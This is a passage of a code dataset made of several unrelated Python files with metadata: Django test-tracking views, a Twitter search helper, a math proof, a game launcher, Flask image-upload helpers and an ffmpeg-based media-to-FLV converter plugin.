)\n\n self_test = {\n \"test01\" : show_time_jenkins_test_01,\n \"test02\" : show_time_jenkins_test_02,\n \"test03\" : show_time_jenkins_test_03,\n \"test04\" : show_time_jenkins_test_04,\n \"test05\" : show_time_jenkins_test_05,\n \"test06\" : show_time_jenkins_test_06,\n \"test07\" : show_time_jenkins_test_07,\n }\n\n def __init__(self, platform, test_version):\n self.platform = platform\n self.test_version = test_version\n\n def get_data(self):\n t = JenkinsProvider.self_test[self.test_version](self.platform)\n\n logger_to_jenkins = logging.getLogger(__name__ + '.from_jenkins')\n logger_to_jenkins.info(pformat(t))\n # pp(t)\n # assert False,'hope'\n\n return t\n\n @property\n def formatted_rawdata(self):\n \"\"\"\n For Jenkins Test Data:\n NOTE: For jenkins data, ONLY one element for list.\n\n >>> [{\n >>> \"PLATFORM\" : \"\",\n >>> \"jenkins\" : {\n >>> 'IR_casetree' : {\n >>> 'ACIS_A_S_Test_Temp_Volt' : {\n >>> 'fw_version' : \"\",\n >>> 'test_result' : \"\",\n >>> 'test_log' : \"\",\n >>> 'test_date' : \"\",\n >>> 'IR_report_path' : \"\",\n >>> },\n >>> 'ACIS_A_S_Test_Temp_ssss' : {\n >>> 'fw_version' : \"\",\n >>> 'test_result' : \"\",\n >>> 'test_log' : \"\",\n >>> 'test_date' : \"\",\n >>> 'IR_report_path' : \"\",\n >>> },\n >>> 'ACIS_A_S_Test_Temp_abcd' : {\n >>> 'fw_version' : \"\",\n >>> 'test_result' : \"\",\n >>> 'test_log' : \"\",\n >>> 'test_date' : \"\",\n >>> 'IR_report_path' : \"\",\n >>> },\n >>> ... ...\n >>> }\n >>> }\n >>> }]\n \"\"\"\n return self.get_data()\n\nclass SubProvider(vcore.Provider):\n\n @property\n def formatted_rawdata(self):\n from .test_cookies_of_rex import random_gen_cookies\n return random_gen_cookies()\n\n\nclass IntegrationExtractor(vcore.Extractor):\n\n @property\n def UI_data(self):\n UI_out = []\n\n data = self._get_data()\n\n out = {}\n for case_name, vs in data['IR_casetree'].items():\n out['platform'] = data['platform']\n out['fw_version'] = data['fw_version']\n\n out['case_name'] = case_name\n out['erd_id'] = vs['erd_id']\n out['test_log'] = vs['test_log']\n out['test_date'] = vs['test_date']\n out['test_result'] = vs['test_result']\n out['IR_report_path'] = vs['IR_report_path']\n UI_out.append(out)\n out = {}\n\n return UI_out\n\n\nclass DefaultExtractor(vcore.Extractor):\n\n def is_vaild_ver(self, spec_ver):\n return True if type(spec_ver) == str and re.match('\\d{2}.\\d{2}', spec_ver) else False\n\n def ext_snapshot(self, platform , spec_ver = \"max\"):\n\n out = []\n data = self._get_data().pop(platform)\n\n for d in data:\n tmp_out = {}\n\n ERD_ID = d\n others = data[d]\n\n if not others['excel']: continue\n\n versions = sorted(list(others['excel'].keys()))\n sub_versions = []\n\n if spec_ver == \"max\":\n lastest_ver = max(versions)\n sub_versions = versions\n else:\n if not self.is_vaild_ver(spec_ver):\n sub_versions = versions\n lastest_ver = max(versions)\n else:\n if spec_ver in versions:\n sub_versions = versions[:versions.index(spec_ver) + 1]\n lastest_ver = spec_ver\n else:\n if spec_ver > max(versions):\n sub_versions = versions\n lastest_ver = max(versions)\n elif spec_ver < min(versions):\n sub_versions = []\n lastest_ver = \"\"\n else:\n for v in versions:\n if spec_ver < v:\n sub_versions = versions[:versions.index(v)]\n lastest_ver = versions[versions.index(v)-1]\n break\n\n # print(\"UI lastest version : <{}> for ERD : [{}]\".format(lastest_ver, ERD_ID))\n\n if lastest_ver == \"\":\n continue\n\n print(\"versions : {}\".format(versions))\n print(\"sub_versions : {}\".format(sub_versions))\n\n tmp_out['version'] = {}\n\n for sv in sub_versions:\n if others['excel'][sv]['description'] == 'blank':\n tmp_out['version'][sv] = 'deactive'\n else:\n tmp_out['version'][sv] = 'active'\n\n print(\"output version dict: {}\".format(tmp_out['version']))\n\n deep_excel = others['excel'][lastest_ver]\n deep_jira = others['jira'][lastest_ver]\n\n # excel part : ERD table partition\n tmp_out['erd_id'] = deep_excel['erd_id']\n tmp_out['platform'] = deep_excel['platform']\n tmp_out['author'] = deep_excel['author']\n tmp_out['category'] = deep_excel['category']\n tmp_out['product_priority'] = deep_excel['product_priority']\n tmp_out['title'] = deep_excel['title']\n tmp_out['description'] = deep_excel['description']\n\n # jira part : ERD table partition\n tmp_out['HLD'] = deep_jira['HLD']\n tmp_out['l1_jira'] = deep_jira['l1_jira']\n tmp_out['l2_jira'] = deep_jira['l2_jira']\n tmp_out['status'] = deep_jira['status']\n tmp_out['workload'] = deep_jira['workload']\n if deep_jira['bug_jiras']:\n tmp_out['bug_jiras'] = deep_jira['bug_jiras'].split(',')\n else:\n tmp_out['bug_jiras'] = []\n\n # jira part : TestCases table partition\n # Now Maybe 'case_age' NOT display\n tmp_out['case_name'] = list(deep_jira['F_casetree'].keys())\n tmp_out['F_report_path'] = []\n for dj in deep_jira['F_casetree']:\n tmp_out['F_report_path'].append(deep_jira['F_casetree'][dj]['F_report_path'])\n\n out.append(tmp_out)\n\n return out\n\n\ndef query_switch(request):\n\n if request.method == \"GET\":\n platform = request.GET.get('platform')\n action = request.GET.get('action')\n\n if action == 'ERD_table_version':\n print(\"recored query:\\n{}\\n{}\\n{}\".format(platform,action,request.GET.get('ErdTableVersion')))\n erd_table_version = request.GET.get('ErdTableVersion')\n\n de = DefaultExtractor([platform.upper()])\n vcore.splitter('pick_all', extractor = de )\n\n out = de.ext_snapshot(platform = platform.upper(), spec_ver = erd_table_version)\n\n return render(request, 'LigerUI/ACIS/rex_debug/rex_test_page.htm', {'cookies' : json.dumps(out)})\n\n elif action == 'integration_version':\n fw_version = request.GET.get('FirmwareVersion')\n ie = IntegrationExtractor([platform],fw_version = fw_version)\n vcore.splitter('pick_all', extractor = ie )\n\n return render(request, 'LigerUI/ACIS/integration_page.htm', {'cookies' : json.dumps(ie.UI_data)})\n\n else:\n return HttpResponseNotFound(\"

    Please input 'platform' and 'action' togather.

    \")\n\n elif request.method == \"POST\":\n print(\"POST request, but do nothing.\")\n\ndef rex_home(request):\n\n de = DefaultExtractor(['SD55'])\n vcore.splitter('pick_all', extractor = de )\n out = de.ext_snapshot('SD55')\n mlogger(pformat(out))\n return render(request, 'LigerUI/ACIS/rex_debug/rex_test_page.htm', {'cookies' : json.dumps(out)})\n\ndef ERD_9X28_index(request):\n\n de = DefaultExtractor(['9X28'])\n vcore.splitter('pick_all', extractor = de )\n out = de.ext_snapshot('9X28')\n pp(type(out))\n return render(request, 'LigerUI/ACIS/rex_debug/rex_test_page.htm', {'cookies' : json.dumps(out)})\n\ndef ERD_9X40_index(request):\n\n de = DefaultExtractor(['9X40'])\n vcore.splitter('pick_all', extractor = de )\n out = de.ext_snapshot('9X40')\n return render(request, 'LigerUI/ACIS/rex_debug/rex_test_page.htm', {'cookies' : json.dumps(out)})\n\ndef ERD_SD55_index(request):\n\n de = DefaultExtractor(['SD55'])\n vcore.splitter('pick_all', extractor = de )\n out = de.ext_snapshot('SD55')\n return render(request, 'LigerUI/ACIS/rex_debug/rex_test_page.htm', {'cookies' : json.dumps(out)})\n\ndef columns_data_select(request):\n return render(request, 'LigerUI/ACIS/columns_data_select.htm')\n\ndef help(request):\n return render(request, 'LigerUI/ACIS/help.htm', {})\n\ndef about(request):\n return render(request, 'LigerUI/ACIS/about.htm', {})\n\ndef query(request):\n return render(request, 'LigerUI/ACIS/query.htm', {})\n\n\ndef do_save_excel():\n vcore.splitter('save', provider = ExcelProvider())\n\ndef do_save_jira():\n vcore.splitter('save', provider = JiraProvider())\n\ndef do_save_jenkins():\n vcore.splitter('save', provider = JenkinsProvider())\n\ndef do_save_UI():\n pass\n\n\ndef do_save_excel_test1():\n vcore.splitter('save', provider = ExcelProvider(test_version = 'first'))\ndef do_save_excel_test2():\n vcore.splitter('save', provider = ExcelProvider(test_version = 'second'))\ndef do_save_excel_test3():\n vcore.splitter('save', provider = ExcelProvider(test_version = 'third'))\ndef do_save_excel_test4():\n vcore.splitter('save', provider = ExcelProvider(test_version = 'fourth'))\n\ndef do_save_excel_test1_o():\n vcore.splitter('save', provider = ExcelProvider(platform = '9X28', test_version = 'first'))\ndef do_save_excel_test2_o():\n vcore.splitter('save', provider = ExcelProvider(platform = '9X28', test_version = 'second'))\ndef do_save_excel_test3_o():\n vcore.splitter('save', provider = ExcelProvider(platform = '9X28', test_version = 'third'))\ndef do_save_excel_test4_o():\n vcore.splitter('save', provider = ExcelProvider(platform = '9X28', test_version = 'fourth'))\n\n\ndef do_save_jira_test1():\n vcore.splitter('save', provider = JiraProvider(platform = 'SD55', test_version = 'first'))\n\ndef do_save_jira_test2():\n vcore.splitter('save', provider = JiraProvider(platform = 'SD55', test_version = 'second'))\n\ndef do_save_jira_test3():\n vcore.splitter('save', provider = JiraProvider(platform = 'SD55', test_version = 'third'))\n\ndef do_save_jira_test1_o():\n vcore.splitter('save', provider = JiraProvider(platform = '9X28', test_version = 'first'))\ndef do_save_jira_test2_o():\n vcore.splitter('save', provider = JiraProvider(platform = '9X28', test_version = 'second'))\ndef do_save_jira_test3_o():\n vcore.splitter('save', provider = JiraProvider(platform = '9X28', test_version = 'third'))\n\n\n\ndef do_save_jenkins_test1():\n vcore.splitter('save', provider = JenkinsProvider(platform = 'SD55', test_version = 'first'))\ndef do_save_jenkins_test2():\n vcore.splitter('save', provider = JenkinsProvider(platform = 'SD55', test_version = 'second'))\ndef do_save_jenkins_test3():\n vcore.splitter('save', provider = JenkinsProvider(platform = 'SD55', test_version = 'third'))\n\ndef do_save_jenkins_test1_o():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X28', test_version = 'first'))\ndef do_save_jenkins_test2_o():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X28', test_version = 'second'))\ndef do_save_jenkins_test3_o():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X28', test_version = 'third'))\n\nsupported_cmds = {\n 'save_excel_data' : do_save_excel,\n 'save_jira_data' : do_save_jira,\n 'save_jenkins_data': do_save_jenkins,\n 'save_UI_data' : do_save_UI,\n\n 'save_excel_data_test1_SD55' : do_save_excel_test1,\n 'save_excel_data_test2_SD55' : do_save_excel_test2,\n 'save_excel_data_test3_SD55' : do_save_excel_test3,\n 'save_excel_data_test4_SD55' : do_save_excel_test4,\n\n 'save_excel_data_test1_9X28' : do_save_excel_test1_o,\n 'save_excel_data_test2_9X28' : do_save_excel_test2_o,\n 'save_excel_data_test3_9X28' : do_save_excel_test3_o,\n 'save_excel_data_test4_9X28' : do_save_excel_test4_o,\n\n 'save_jira_data_test1_SD55' : do_save_jira_test1,\n 'save_jira_data_test2_SD55' : do_save_jira_test2,\n 'save_jira_data_test3_SD55' : do_save_jira_test3,\n\n 'save_jira_data_test1_9X28' : do_save_jira_test1_o,\n 'save_jira_data_test2_9X28' : do_save_jira_test2_o,\n 'save_jira_data_test3_9X28' : do_save_jira_test3_o,\n\n 'save_jenkins_data_test1_SD55' : do_save_jenkins_test1,\n 'save_jenkins_data_test2_SD55' : do_save_jenkins_test2,\n 'save_jenkins_data_test3_SD55' : do_save_jenkins_test3,\n\n 'save_jenkins_data_test1_9X28' : do_save_jenkins_test1_o,\n 'save_jenkins_data_test2_9X28' : do_save_jenkins_test2_o,\n 'save_jenkins_data_test3_9X28' : do_save_jenkins_test3_o,\n}\n\ndef rex_commands(request):\n return render(request, 'LigerUI/ACIS/rex_debug/rex_debug_commands.htm', {'cmds' : list(supported_cmds.keys())})\n\ndef rex_actions_dispatcher(request):\n # Maybe only one.\n for name, cmd in request.GET.items():\n if name == \"command\":\n if cmd and cmd in supported_cmds:\n supported_cmds[cmd]()\n return HttpResponseRedirect(\"/rex_commands/\")\n\n\ndef show_time_do_excel_save():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'first'))\n\ndef show_time_do_jira_save_first():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'first'))\n\ndef show_time_do_jira_save_second():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'second'))\n\ndef show_time_do_jira_save_third():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'third'))\n\n\ndef show_time_do_excel_second_update():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'second'))\n # vcore.splitter('save', provider = RexJiraProvider(platform = 'SD55', test_version = 'follow'))\n\ndef show_time_do_excel_third_update():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'third'))\n # vcore.splitter('save', provider = RexJiraProvider(platform = 'SD55', test_version = 'follow'))\n\ndef show_time_do_excel_fourth_update():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'fourth'))\n # vcore.splitter('save', provider = RexJiraProvider(platform = 'SD55', test_version = 'follow'))\n\ndef show_time_do_follow_excel():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'follow'))\n\n\ndef do_step_01():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'first'))\n\ndef do_step_02():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'first'))\n\ndef do_step_03():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'second'))\n\ndef do_step_04():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X40', test_version = 'test01'))\n\ndef do_step_05():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'second'))\n\ndef do_step_06():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'follow01'))\n\ndef do_step_07():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X40', test_version = 'test02'))\n\ndef do_step_08():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'third'))\n\ndef do_step_09():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X40', test_version = 'test03'))\n\ndef do_step_10():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'third'))\n\ndef do_step_11():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'follow02'))\n\ndef do_step_12():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X40', test_version = 'test04'))\n\ndef do_step_13():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'fourth'))\n\ndef do_step_14():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X40', test_version = 'test05'))\n\ndef do_step_15():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'fourth'))\n\ndef do_step_16():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'follow03'))\n\ndef do_step_17():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X40', test_version = 'test06'))\n\ndef do_step_18():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X40', test_version = 'test07'))\n\nshow_supported_cmds = {\n 'do_step_01' : do_step_01,\n 'do_step_02' : do_step_02,\n 'do_step_03' : do_step_03,\n 'do_step_04' : do_step_04,\n 'do_step_05' : do_step_05,\n 'do_step_06' : do_step_06,\n 'do_step_07' : do_step_07,\n 'do_step_08' : do_step_08,\n 'do_step_09' : do_step_09,\n 'do_step_10' : do_step_10,\n 'do_step_11' : do_step_11,\n 'do_step_12' : do_step_12,\n 'do_step_13' : do_step_13,\n 'do_step_14' : do_step_14,\n 'do_step_15' : do_step_15,\n 'do_step_16' : do_step_16,\n 'do_step_17' : do_step_17,\n 'do_step_18' : do_step_18,\n}\n\nglobal_cmd = \"\"\ndef rex_show_actions_dispatcher(request):\n # assert False, \"Rex >> {}\".format(request.path)\n print(\"Hook: GET->{} , POST->{}, path->{}\".format(request.GET,request.POST, request.path))\n global global_cmd\n for name, cmd in request.GET.items():\n if name == \"command\":\n if cmd and cmd in show_supported_cmds:\n show_supported_cmds[cmd]()\n global_cmd = cmd\n #return HttpResponseRedirect(\"/rex_commands/\")\n return HttpResponseRedirect(\"/rex_prompt/\")\n\ndef rex_prompt(request):\n global global_cmd\n #return render(request, 'LigerUI/ACIS/rex_debug/prompt.htm', {'cmd' : global_cmd})\n return HttpResponse(\"Command : {} done\".format(global_cmd))\n\ndef rex_test_query(request):\n from ..vcore import TestReportQuery\n #q = TestReportQuery('integration_query_exactly', platform= 'SD55', fw_version=\"SWI9X28A_00.11.01.06\", test_date=\"2019-02-03\")\n # q = TestReportQuery('integration_query_exactly', platform= 'SD55', fw_version=\"SWI9X28A_00.11.01.06\", test_date=\"2019-01-03\")\n # q = TestReportQuery('night_regression_query', platform= 'SD55', test_date=\"2019-01-03\")\n # q = TestReportQuery('ERD_caselist_query', platform= 'SD55', ERD_ID=\"04.60.26\")\n q = TestReportQuery('casename_query', platform= 'SD55', casename = \"test_case_03_alpha_02\")\n q.do_query()\n return HttpResponse(\"done\")\n","sub_path":"AcisWeb/AcisDB/rex_debug/views_of_rex.py","file_name":"views_of_rex.py","file_ext":"py","file_size_in_byte":25309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"362808090","text":"import oauth2 as oauth\nimport json\nfrom credentials import *\n\ndef oauth_twitter_search(query, consumer_key=CONSUMER_KEY, consumer_secret=CONSUMER_SECRET, lang=\"en\", result_type=\"recent\", count=100):\n \"\"\" Search Twitter ...\n looks like Tweets with \"truncated\": true could pose a problem\n \"\"\"\n search_endpoint = \"https://api.twitter.com/1.1/search/tweets.json\"\n compiled_search_endpoint = \"{}?q={}&count={}&result_type={}&lang={}\".format(search_endpoint, query, count, result_type, lang)\n consumer = oauth.Consumer(key=CONSUMER_KEY, secret=CONSUMER_SECRET)\n client = oauth.Client(consumer)\n response, data = client.request(compiled_search_endpoint)\n tweets = json.loads(data)\n return tweets\n\nnasa_tweets = oauth_twitter_search(\"@nasa\")\ncontrol_tweets = oauth_twitter_search(\"the\")\n","sub_path":"twitter_ml.py","file_name":"twitter_ml.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"327313336","text":"from util import *\n\n\n\n@apply\ndef apply(self):\n x = self.of(Floor)\n\n return Equal(self, -ceiling(-x))\n\n\n@prove\ndef prove(Eq):\n from axiom import algebra\n x = Symbol(real=True)\n Eq << apply(floor(x))\n\n Eq << -Eq[0]\n\n Eq << Eq[-1].this.rhs.apply(algebra.ceiling.to.mul)\n\nif __name__ == '__main__':\n run()\n\n# created on 2018-10-22\n","sub_path":"axiom/algebra/floor/to/mul/ceiling.py","file_name":"ceiling.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"643843788","text":"#!/usr/bin/env python\n\n'''\n'''\n\n__docformat__ = 'restructuredtext'\n__version__ = '$Id: $'\n\nimport sys\n\nif sys.platform == 'win32' and False:\n sys.stderr = sys.stdout = open('errors.txt', 'w')\n\nimport pyglet\n\npyglet.options['debug_gl'] = False\n\npyglet.resource.path = ('res',)\npyglet.resource.reindex()\n\nimport gamelib\ngamelib.main()\n","sub_path":"CreateApplications/pyweek/kite_story-1.1/run_game.py","file_name":"run_game.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"370791396","text":"# for文と同じ働きをする関数を自作\ndef for_func(iterable, callback):\n it = iter(iterable)\n while True:\n try:\n v = next(it)\n callback(v)\n except StopIteration:\n break\n\n# リストの内容を全て画面に表示\nnums = [1, 2, 3]\nfor_func(nums, lambda i : print(i))\n\n# 辞書型の内容を全て画面に表示\nages = {\"Taro\":20, \"Jiro\":15, \"Saburo\":18}\nfor_func(ages.items(), lambda n :print(n))\n\n","sub_path":"for-func.py","file_name":"for-func.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"519434419","text":"import os\nimport sys\nimport uuid\nimport common\nimport requests\nimport traceback\nimport numpy as np\nfrom PIL import Image\nfrom search import Search\nfrom urllib.parse import urlparse\nfrom io import StringIO\nfrom enums import*\nfrom common import*\nfrom common_config import Common_config\nfrom flask import Flask, render_template, request, jsonify, make_response, url_for, g\n\n\nconfig = Common_config()\nroot_direc = config.get_root_path()\nsample_direc = config.get_sample_img_path()\nupload_direc = config.get_upload_path()\nmodel_path = config.get_model_path()\n\nmax_file_size = 3750000\n\ndef str2bool(v):\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\ndef delete_all_uploaded():\n\n directory = \".\" + upload_direc\n for root, dirs, files in os.walk(directory):\n for file in files:\n print(file)\n os.remove(file)\n\ndef get_file_ext(file_path):\n\n\ttemp = file_path.split('.')\n\tlength = len(temp)\n\tif(length > 0):\n\t\treturn temp[length - 1]\n\treturn \"jpg\"\n\ndef get_parsed_url(url):\n \n o = urlparse(url)\n url = o.geturl()\n\n return url.strip()\n\ndef get_img_filename_from_url(self):\n \n temp = request.args.get(\"url\").split('\\\\')\n img_url = temp[len(temp) - 2] + \"/\" + temp[len(temp) - 1]\n return img_url\n \ndef is_largeimage_size(file):\n \n img_bytes = file.read()\n file_size = sys.getsizeof(img_bytes)\n\n if(file_size < max_file_size):\n return False\n return True\n\ndef has_large_dimensions(file):\n\n \n im = Image.open(file)\n width, height = im.size\n \n if(width > 1600):\n return True\n if(height > 1600):\n return True\n\n\ndef resize_image(img_path, img_full_path):\n\n try:\n \n image = Image.open(open(img_full_path, mode='rb'))\n\n width = image.size[0]\n height = image.size[1]\n \n file_size = None\n\n if(width < height and width > 1600):\n\n img_bytes, img_path, image = save_image_new_size(image, 1600, height)\n file_size = sys.getsizeof(img_bytes)\n \n elif(height < width and height > 1600):\n \n img_bytes, img_path, image = save_image_new_size(image, width, 1600)\n file_size = sys.getsizeof(img_bytes)\n \n if(not file_size is None):\n \n while (file_size > max_file_size):\n \n next_width = width - 150\n next_height = next_width\n img_bytes, img_path, image = save_image_new_size(image, next_width, \n next_height)\n\n file_size = sys.getsizeof(img_bytes)\n width = next_width\n\n return img_path\n\n except Exception as e:\n var = traceback.format_exc()\n print(str(var))\n return None\n\ndef save_image_new_size(image, width, height):\n \n img_path = upload_direc + \"/\" + str(uuid.uuid4()) + \".\" + image.format\n file_path = root_direc +\"/\" + img_path\n \n '''thumbnail will maintain aspect ratio'''\n image.thumbnail((width, height), Image.ANTIALIAS)\n image.save(file_path, format=image.format)\n img_bytes = open(file_path, mode='rb').read()\n \n return img_bytes, img_path, image\n\ndef save_url_img(url, file_content):\n\n file_ext = get_file_ext(url)\n if(not file_ext.lower() in [\"jpg\", \"jpeg\", \"png\"]):\n file_ext = \"jpg\"\n \n file_name = str(uuid.uuid4()) + \".\" + file_ext\n\n file_path = root_direc + \"/\" + upload_direc + \"/\" + file_name\n \n file = open(file_path, 'wb')\n file.write(file_content)\n file.close()\n\n img_path = upload_direc + \"/\" + file_name\n return img_path\n\ndef save_posted_file(posted_file):\n \n file_ext = get_file_ext(posted_file.filename)\n file_name = str(uuid.uuid4()) + posted_file.filename\n file_path = root_direc + \"/\" + upload_direc + \"/\" + file_name\n posted_file.save(file_path)\n \n img_path = upload_direc + \"/\" + file_name\n\n return img_path\n\ndef get_image_paths(img_path):\n \n img_path = request.args.get(\"imgPath\").replace(\"thumbnails\", \"animals\").replace(\"\\\\\", \"/\")\n \n img_full_path = root_direc + img_path\n\n return img_path, img_full_path\n\ndef check_if_valid_image(img_path):\n try:\n img = Image.open(img_path) # open the image file\n img.verify() \n return True, \"no error\"\n except (IOError, SyntaxError) as e:\n print('Bad file:', img_path)\n print(str(e))\n return False, \"Sorry, Could not read the image\"","sub_path":"demo/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"41162421","text":"# Copyright (C) 2008 Distance and e-Learning Centre,\n# University of Southern Queensland\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n#\n\nimport os\n\n\"\"\" Plugin to convert media files: audio/video to .flv files \"\"\"\n\npluginName = \"ice.converter.mediaToFlv\"\npluginDesc = \"Convert media files to flv\"\npluginFunc = None # either (or both) pluginFunc or pluginClass should\npluginClass = None # be set by the pluginInit() method\npluginInitialized = False # set to True by pluginInit() method\n\ndef pluginInit(iceContext, **kwargs):\n global pluginFunc, pluginClass, pluginInitialized\n pluginFunc = None\n pluginClass = MediaToFlv\n pluginInitialized = True\n return pluginFunc\n\nclass MediaToFlv(object):\n mimeType = [\"audio\", \"video\"]\n \n def __init__(self, iceContext, **kwargs):\n self.iceContext = iceContext\n self.__mediaToFlvWrapper = MediaToFlvWrapper(iceContext)\n self.__isAvailable = self.__mediaToFlvWrapper.isAvailable\n self.__convertServer = None\n if self.__isAvailable==False:\n self.__convertServer = iceContext.getPluginClass(\"ice.extra.convertServer\")\n\n @property\n def isAvailable(self):\n return self.__isAvailable\n \n def convert(self, fromToObj, **kwargs):\n \"\"\"\n fromToObj must support the following methods:\n getFromFile(), getToFile(), getData(), putData(data=data [, name=None])\n \"\"\"\n return self.__mediaToFlvWrapper.ffmpeg(fromToObj)\n\n############################\n\n\nclass MediaToFlvWrapper(object):\n \"\"\" Conversion of media file to flv format and vice versa \"\"\"\n \n \"Not tested extension: mov,3gp,3g2,mj2\"\n def __init__(self, iceContext):\n self.iceContext = iceContext\n self.__fs = iceContext.fs\n self.__system = iceContext.system\n self.__ffmpegAvailable = None\n\n @property\n def isAvailable(self):\n if self.__ffmpegAvailable is None:\n self.__ffmpegAvailable = self.__ffmpegAvailableCheck()\n return self.__ffmpegAvailable\n\n def ffmpeg(self, inputFile, outputFile = None, outputType=\".flv\", **kwargs):\n \"\"\" run ffmpeg to convert the audio/video to flv\n @param inputFile: absolute path of the audio/video file\n @type inputFile: String\n @param outputFile: absolute path of the converted audio/video file\n @type inputFile: String\n \n @rtype: String\n @return: outputFile path\n \n Parameters of ffmpeg\n #-y :: overwrite the output file if it already exists\n #-i [inputFile.ext] :: the input video file\n #-acodec libfaac :: using the aac codec --> This acodec might not be necessary as it require the codec to be installed\n #-ar 44100 :: the audio sampling rate\n #-ab 96k :: the audio bitrate\n #-vcodec libx264 :: use the x264 codec\n #-s 1280x540 :: the size of the output video\n #-b 1600k :: the bitrate of the output video\n #-g 250 :: frequency of keyframes\n #-r 20 :: the frame rate\n #[outputFile.ext] :: the output file\n \n #converting .mp4 to .flv\n #ffmpeg -i test.mp4 -sameq -deinterlace -s 384x288 -aspect 4:3 -b 512k -y -ac 1 testmp4.flv \n \n #converting .wav to .flv\n #ffmpeg -i test.wav -ab 8000 testwav.flv\n \n #converting .wmv to .flv\n #ffmpeg -i \"test.wmv\" -sameq -ar 22050 -ab 96000 -deinterlace -nr 500 -s 320x240 -aspect 4:3 -r 20 -g 500 -me_range 20 -b 270k -deinterlace -f flv -y \"testwmv.flv\" //-acodec libmp3lame is removed\n \n #converting .mov to .flv\n #ffmpeg -y -i trailerTest.mov -ar 44100 -ab 96k -coder ac -me full -me_range 16 -subq 5 -sc_threshold 40 -s 1280x544 -b 1600k -cmp +chroma -partitions +parti4x4+partp8x8+partb8x8 -i_qfactor 0.71 -keyint_min 25 -b_strategy 1 -g 250 -r 20 87.mp4;\n \"\"\"\n \n path, name, ext = self.__fs.splitPathFileExt(inputFile)\n if outputFile is None:\n outputFile = self.__fs.join(path, name + outputType)\n \n cmd = \"\"\n if ext == \".mp4\":\n cmd = 'ffmpeg -i \"%s\" -sameq -deinterlace -s 384x288 -aspect 4:3 -b 512k -y -ac 1 \"%s\"' % (inputFile, outputFile)\n elif ext == \".wav\":\n cmd = 'ffmpeg -i \"%s\" -ab 8000 -ar 11025 \"%s\"' % (inputFile, outputFile)\n elif ext == \".wma\":\n cmd = 'ffmpeg -i \"%s\" -ab 8000 \"%s\"' % (inputFile, outputFile)\n elif ext == \".wmv\":\n cmd = 'ffmpeg -i \"%s\" -sameq -ar 22050 -ab 96000 -deinterlace -nr 500 -s 320x240 -aspect 4:3 -r 20 -g 500 -me_range 20 -b 270k -deinterlace -f flv -y \"%s\"' % (inputFile, outputFile)\n elif ext == \".mov\":\n #cmd = 'ffmpeg -y -i \"%s\" -ar 44100 -ab 96k -coder ac full -me_range 16 -subq 5 -sc_threshold 40 -s 1280x544 -b 1600k -cmp +chroma -partitions +parti4x4+partp8x8+partb8x8 -i_qfactor 0.71 -keyint_min 25 -b_strategy 1 -g 250 -r 20 \"%s\"' % (inputFile, outputFile);\n cmd = 'ffmpeg -i \"%s\" -ar 22050 -ab 128k -b 400k -s 320x240 -aspect 4:3 -f flv \"%s\"' % (inputFile, outputFile)\n elif ext == \".mp3\":\n cmd = 'ffmpeg -y -i \"%s\" -f flv -ab 64 -ac 1 \"%s\"' % (inputFile, outputFile)\n elif ext == \".m4a\":\n cmd = 'ffmpeg -i \"%s\" -f flv -b 300000 -s 360x240 -r 30 -ac 2 -ab 64k -ar 44100 -vcodec flv \"%s\"' % (inputFile, outputFile)\n elif ext == \".mpg\" or ext == \".mpeg\":\n cmd = 'ffmpeg -i \"%s\" -ar 22050 -ab 32 -f flv -s 320x240 -aspect 4:3 -y \"%s\"' % (inputFile, outputFile)\n else:\n outputFile = \"\"\n raise 